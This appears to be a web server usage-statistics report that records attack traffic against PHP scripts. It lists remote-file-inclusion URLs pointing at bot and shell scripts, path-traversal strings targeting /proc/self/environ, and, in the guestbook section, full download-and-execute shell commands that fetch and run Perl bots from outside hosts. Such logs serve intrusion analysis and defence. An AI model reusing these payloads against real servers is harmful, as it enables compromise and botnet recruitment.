http://drugs.kit.net/priv8.txt? 3
http://www.timvideo.xpg.com.br/inbox.txt? 3
http://www.cfr.cl/mail/bitch.txt?? 3
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?
2
http://www.exploreoceans.org/templates/cads.txt? 2
OTHER: 938
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://scripts.crewhosting.com/t.txt??http://scripts.crewhos
ting.com/t.txt??
1
http://www.stdr.xpg.com.br/teste_spam.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://76.79.79.181/feia.txt? 2
http://seucu.us/p? 2
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://h1.ripway.com/sur00t/r0x.txt? 1
http://invisionarg.webcindario.com/eth0? 1
http://www.gratisweb.com/tomcruise2005/tester.txt? 1
http://members.lycos.co.uk/enviescraps/pbot.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/yahwek/phpbot2.txt? 4
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://yigw.sntcm.edu.cn/jamaica.txt 1
http://freewebs.com/0m4rc170/asd.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.lordxpl.xpg.com.br/own.txt? 3
http://noden.110mb.com/kua.txt? 2
http://xsenharox.xpg.com.br/e_sempre_nois.txt? 2
OTHER: 963
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://members.lycos.co.uk/gmtandi/a/cmd.txt? 1
http://h1.ripway.com/mah/capeta.txt? 1
http://www.ilegais.xpg.com.br/spread.txt?? 1
Parameter mosConfig_absolute_pathhttp://206.71.148.89/pbot.txt??]
ValueAccesses
1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/yahwek/phpbot.txt? 9
http://www.digownz.kit.net/pbot1.txt?? 7
http://redinhu.we.bs/pbot.txt? 6
http://www.rj2009.kit.net/ddd.txt? 6
http://www.packet.kit.net/p? 4
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 4
OTHER: 934
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/sethz/php.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.flyafac.com/images/kua.txt? 4
http://www.freewebs.com/scanspread/bozo.txt? 3
http://www.adobeflashplayer9br.net/macromedia/ultimate.txt? 2
http://www.rj2009.kit.net/burro.txt? 2
OTHER: 959
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_pathhttp://trumina.maxihost.com.br/pBOT.t
xt??
ValueAccesses
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://usuarios.arnet.com.ar/larry123/http.txt?? 3
http://www.fuck-all.kit.net/teste2.txt? 2
http://normanzito.iespana.es/http.txt?? 2
OTHER: 963
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/fudededhere/httd.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/playssonn/dq.txt? 1
http://lol1234.fileave.com/script9.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?http:/
/64.32.13.169/ma.txt?http://64.32.13.169/ma.txt?
1
http://utilz.iespana.es/u2.gif? 1
http://www.vsm.gov.tr/red.txt?? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://scanbx.iespana.es/php.txt?? 2
http://cornuletz.angelfire.com/c99in.txt? 2
http://br.geocities.com/daimonium007/tool.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/sur00tseclan/httd.txt 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.bsthank.t35.com/Outros/spread.txt? 1
http://usuarios.arnet.com.ar/larry123/http?? 1
http://www.freewebs.com/yahwek/xisde.txt.txt? 1
http://razer.we.bs/pbot.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://h1.ripway.com/sur00t/testador.txt?/par 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.capexoutsource.com/sp1.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
www.velohaxors.com/yenor/testeinbox.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://204.11.228.115/id.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://freewebs.com/larryx23/sk1.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://privo.host.sk/testinbox.txt? 1
http://www.rj2009.kit.net/p.txt?? 1
http://www.cfr.cl/mail/bitch.jpg?? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://gline.axspace.com/Gline.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://bsthank.t35.com/ilegais.txt? 1
http://www.packer.kit.net/p? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.nillo.com.br/IT.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://paginas.terra.com.br/lazer/systrack/pbot.txt? 1
http://www.dropmachine.com/skins/advanced/config/tester.txt?
1
http://h1.ripway.com/wpk/bnet2.txt 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://snock.110mb.com/spread.txt???http://snock.110mb.com/s
pread.txt???http://snock.110mb.com/spread.txt???http://snock
.110mb.com/spread.txt???http://snock.110mb.com/spread.txt???
1
http://www.trtombraiders.com/config/tester.txt? 1
http://boladaojunin.iespana.es/testeinbox2.txt?? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.digownz.kit.net/q.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/haddem/botnetphp.txt 1
http://lifetogether.us./lt/family/bitch.txt?? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.diabinhoinfernal1.kit.net/b.txt? 1
http://h1.ripway.com/sur00t/testador.txt?/par 1
http://qlzrox.iespana.es/p7? 1
Parameter s
ValueAccesses
r 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://bobatka.info/modules/language/asc/asc/r7???? 1
http://www.xsenhalol.xpg.com.br/subaj??? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://andravarldar.se/cmd? 2
http://hackearhotmail.com 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://snock.110mb.com/spread.txt?? 1
http://redinhu.we.bs/pbot.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://hackearhotmail.com/phpb.txt?http://hackearhotmail.com
/phpb.txt?
1
http://mensagem.hut2.ru/env.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://tigerz.host.sk/cnew.txt? 1
http://63.247.81.138/~ucrol/maya1.txt?? 1
http://globalnet.hn/bitch.gif?? 1
http://snock.110mb.com/spread.txt??/par 1
http://scanbx.iespana.es/php.txt?? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.digownz.kit.net/pbot1.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://xsenharox.xpg.com.br/e_sempre_nois.txt? 1
http://www.freewebtown.com/c4sh12345/cmd2.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.friendsclan.eu/cmd.txt? 2
http://globalnet.hn/bitch.gif?? 1
http://www.r0n4n.kit.net/HeheInbox.txt? 1
http://www.brasvip.org/box/teste.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://nartok.com/CMS/cache/cmds.txt? 1
http://usuarios.arnet.com.ar/larry123/prot.txt?? 1
http://www.apburo.ru/classes/adodbt/gabriel.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.rapimusica.com/morgan.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.atkk3.xpg.com.br/botlogin.txt? 1
http://www.atkk3.xpg.com.br/rave.jpg? 1
http://201.11.36.8:32000/mail/test.jpg?? 1
http://scripts.crewhosting.com/httd.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/normancito/asdasd.txt?? 2
http://www.zahnwerk.com/contenido-4.4.4/contenido/includes/p
hpbot.txt?
1
http://piikachu.fileave.com/bot.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://xsenhalol.xpg.com.br/subaj? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.diabinhoinfernal1.kit.net/a.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://snock.host.sk/spread.txt?? 1
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://usuarios.arnet.com.ar/larry123/prot.txt?? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.kibarnakliyat.com:8383/bitch.txt???? 1
ttp://h1.ripway.com/trance/ups 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://69.80.227.41/debugbr2/tool25.dat? 2
http://142.176.17.11/r57.txt?\r 2
http://www.emriz.com/damned.txt?? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.mediart.lu/fr/cmd.txt? 1
http://72.21.36.158/s.txt? 1
http://baixinho.we.bs/cmdimbox.txt 1
http://www.freewebs.com/xlip3/bot.txt? 1
http://www.rapimusica.com/morgan.txt?? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://fxmsn.org/1.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.ghostbuster.xpg.com.br/botphp.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://robertinhopeu.iitalia.com/safex.gif? 1
http://www.dpfsp.org/tester? 1
http://usuarios.arnet.com.ar/adrikrasnow/cv.txt? 1
http://www.codigoo00000.mail15.su/a1.txt 1
http://www.l1nuxgroup.by.ru/id.txt 1
http://www.zendurl.com/d/ddteam/cmdb.txt? 1
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://webmail.servidoreswin.com/bitch.txt??? 1
http://www.acgsoftware.com/1.txt?? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://s3xy.ifrance.com/r7???? 1
http://enviabx.iespana.es/t.txt?? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.xsenharox.xpg.com.br/e_sempre_nois.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.rj2008.kit.net/perl.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://freewebs.com/normancito/prot.txt?? 1
http://142.176.17.11/y.txt? 1
http://www.freewebs.com/normancito/bota.txt?? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://64.32.13.161/httc? 1
http://www.houston-texas-online.com/beaddazzled/images/_note
s/cpread.txt???
1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.atkk3.xpg.com.br/bflood.txt?? 1
http://201.50.200.213:8080/httd.txt? 1
http://hackearhotmail.com 1
http://freewebtown.com/trabalho/CMD.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.strider.we.bs/Bnet/safe.txt? 1
http://mail.admnyagan.ru/config/exp667.txt? 1
http://daimonium009.googlepages.com/daimo.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://mail.admnyagan.ru/config/exp667.txt? 1
http://www.apburo.ru/classes/adodbt/misterio.txt? 1
http://www.oifotosbrasil.com/tester.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://ilegals.ifrance.com/xyr??? 1
http://suspended.by.ru/php.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://3sk3nt.kit.net/p.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.acb.bs.it/moodledata/cache/cmdlist.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://tigerz.host.sk/c.txt? 1
http://www.lordxpl.xpg.com.br/own.txt? 1
http://www.handymoney.ru/w1/vai.txt? 1
http://www.cfr.cl/mail/bot.txt?? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://duck.prplayers.net/duckbot.txt?? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://h1.ripway.com/trance/up.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://utilz.iespana.es/n2.gif? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/sur00tseclan/spread.txt? 1
http://sanwall.coolpage.biz/test249.txt? 1
http://invisionar.hostinggratisargentina.com/eth0? 1
http://80.35.20.109/gmail.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.digownz.kit.net/dq1.txt? 1
http://www.cfr.cl/mail/bot.txt??? 1
http://raptor.we.bs/bot.txt? 1
http://www.freewebs.com/chadalua/b0t.txt? 1
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.r57.li/r57.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/weekly/2011/05/15/ 967
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 15
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
119
../../../../../../../../../../..//proc/self/environ 00 115
..//..//..//..//..//..//..//..///proc/self/environ 00 66
../../../../../../../../../../..//proc/self/environ 00 56
../../../../../../../../../../../../../../../proc/self/envir
on
56
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
30
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
5
../../../../../../../../../../../../../../..//proc/self/envi
ron
3
..//..//..//..//..//..//..//..///proc/self/environ 3
..//..//..//..//..//..//..//..//..//..//..//..//..//proc/sel
f/environ
2
Parameter option
ValueAccesses
com_google 342
com_rokdownloads 78
com_juser 22
com_myblog 15
com_goole 9
com_rwcards 6
com_gcalendar 1
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
15
Parameter view
ValueAccesses
rwcards 6
OTHER: 3
ScriptTotal Accesses
/wusage/monthly/2011/03/01/ 951
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 33
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
127
..//..//..//..//..//..//..//..///proc/self/environ 00 79
../../../../../../../../../../..//proc/self/environ 00 78
../../../../../../../../../../../../../../../proc/self/envir
on
39
..//..//..//..//..//..//..//..///proc/self/environ 36
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
19
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
15
../../../../../../../../../../../../../../..//proc/self/envi
ron
9
../../../../../../../../../../..//proc/self/environ 00 7
../../../../../../../../../../../../..//proc/self/environ 00
6
Parameter index.php?option
ValueAccesses
com_google 2
Parameter option
ValueAccesses
com_google 313
com_rokdownloads 54
com_myblog 37
com_gcalendar 20
com_rwcards 19
com_fabrik 6
com_spsnewsletter 5
com_product 3
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
27
..//..//..//..//..//..//..//..///proc/self/environ 00 7
../../../../../../../../../../../../../../../proc/self/envir
on
3
OTHER: 7
ScriptTotal Accesses
/wusage/summary/cgi.html//guestbook/sampleguestbook 927
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
13
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
12
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
10
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
uname -a; id 5
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt
5
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
4
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
3
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
3
Parameter list
ValueAccesses
1 1
Parameter path[docroot]
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 45
http://www.capsoir.com/images/TRA.txt? 24
http://www.cosmick.kit.net/ty.txt? 23
http://www.neoncomanda.kit.net/tool25.dat? 16
http://www.pucorp.t5.com.br/lp.txt? 14
http://proxysx.t35.com/x0.txt? 13
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 13
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 12
http://aszer.republika.pl/cos..txt? 12
http://freewebs.com/diegoxfelix/ch.txt?? 11
OTHER: 675
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/xgallery/upgrade_album.php 912
Parameters by Submitted Value
Parameter
ValueAccesses
2
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 31
http://zuwill.110mb.com/BotneT.txt? 25
http://www.cosmick.kit.net/pbot.txt? 23
http://ownsparaficar.googlepages.com/funfo.txt? 14
http://celup.zoomshare.com/files/injek/karawang.txt?? 12
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 12
http://celup.zoomshare.com/files/injek/hearth.txt?? 12
http://overowns.googlepages.com/testera.txt? 11
http://celup.zoomshare.com/files/injek/bogor.txt?? 11
http://overowns.googlepages.com/donottouch.txt? 10
Parameter GALLERY_baseDir
ValueAccesses
http://manyways.info/email/psm.txt? 1
Parameter GALLunity/alicia-bohol/components/com_rsgallery/rsgallery.ht
ml.php?mosConfig_absolute_path
ValueAccesses
